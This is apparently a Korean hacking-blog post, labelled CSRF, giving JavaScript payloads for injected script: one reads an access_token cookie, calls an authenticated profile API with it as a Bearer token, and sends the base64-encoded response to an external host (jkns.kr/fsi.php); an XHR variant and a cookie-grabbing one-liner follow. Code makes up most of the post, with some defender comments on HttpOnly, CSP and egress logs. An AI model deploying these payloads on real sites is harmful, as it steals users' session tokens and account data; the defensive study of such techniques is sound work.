웹/Hacking
CSRF
즉흥
2022. 3. 10. 10:58
1. fetch 이용하기
// What this shows: script that executes inside the target origin (it has to be
// injected there first, e.g. through an XSS flaw) can read a session token from a
// script-visible cookie, call an authenticated API with it, and move the response
// off-site.
//
// Step 1: extract the access_token cookie. The string is converted to a RegExp by
// match(); capture group 2 is the cookie value. A cookie set with HttpOnly is not
// exposed through document.cookie, so match() returns null and the [2] index
// throws a TypeError, which stops the snippet at this line.
var auth = document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2]
// Step 2: same-origin request to the profile endpoint (relative URL), presenting
// the cookie value as a Bearer token in the Authorization header.
fetch('/mobile-api/rest/api/v1/mobile/me/profile/',{
headers: {
Authorization: 'Bearer ' + auth
}
// Step 3: the response text is URI-encoded, base64-encoded and placed in the `a`
// query parameter of a top-level navigation to an external host over plain http.
// Defender notes: this leaves the site as a page navigation rather than a
// fetch/XHR, so a CSP connect-src restriction does not cover it; the controls that
// matter are preventing script injection and keeping the token out of script
// reach (HttpOnly). In egress/proxy logs it should appear as a navigation to an
// unfamiliar host carrying an unusually long base64 query value.
}).then(a=>a.text()).then(a=>{location='http://jkns.kr/fsi.php?a='+(btoa(encodeURIComponent(a)))})
2. XHR 이용하기
// XMLHttpRequest variant of the same pattern: request a resource, then forward the
// response text to an external host through a top-level navigation.
const xhr = new XMLHttpRequest();
// Absolute http:// URL on the external host. NOTE(review): when the page is not on
// that host this is a cross-origin read, so responseText is only available if the
// server opts in via CORS; on an HTTPS page browsers block the request as mixed
// content.
xhr.open("GET", "http://jkns.kr/test.html");
xhr.onreadystatechange = function () {
// The handler declares no parameter, so `event` resolves to the implicit global
// (window.event) rather than an argument; target is the XHR object itself.
const { target } = event;
// Act only once the request has finished.
if (target.readyState === XMLHttpRequest.DONE) {
console.log(target.responseText);
// unescape(encodeURIComponent(...)) turns the text into a UTF-8 byte string so
// btoa() accepts non-Latin-1 characters; the base64 result travels in the `a`
// query parameter. Defender view: as a navigation it falls outside CSP
// connect-src, and should be visible in egress logs as a long base64 query value
// sent to an external host.
location="http://jkns.kr/fsi.php?a="+btoa(unescape(encodeURIComponent(target.responseText)));
}
};
xhr.send();
3. 특정 쿠키값 가져오기
// Evaluates to the value of the access_token cookie (capture group 2 of the
// pattern). It only works for cookies visible to script: with the HttpOnly
// attribute set the cookie is absent from document.cookie, match() returns null
// and the [2] index throws a TypeError. Session and bearer tokens kept in
// script-readable cookies are therefore exposed to any script running in the page.
document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2]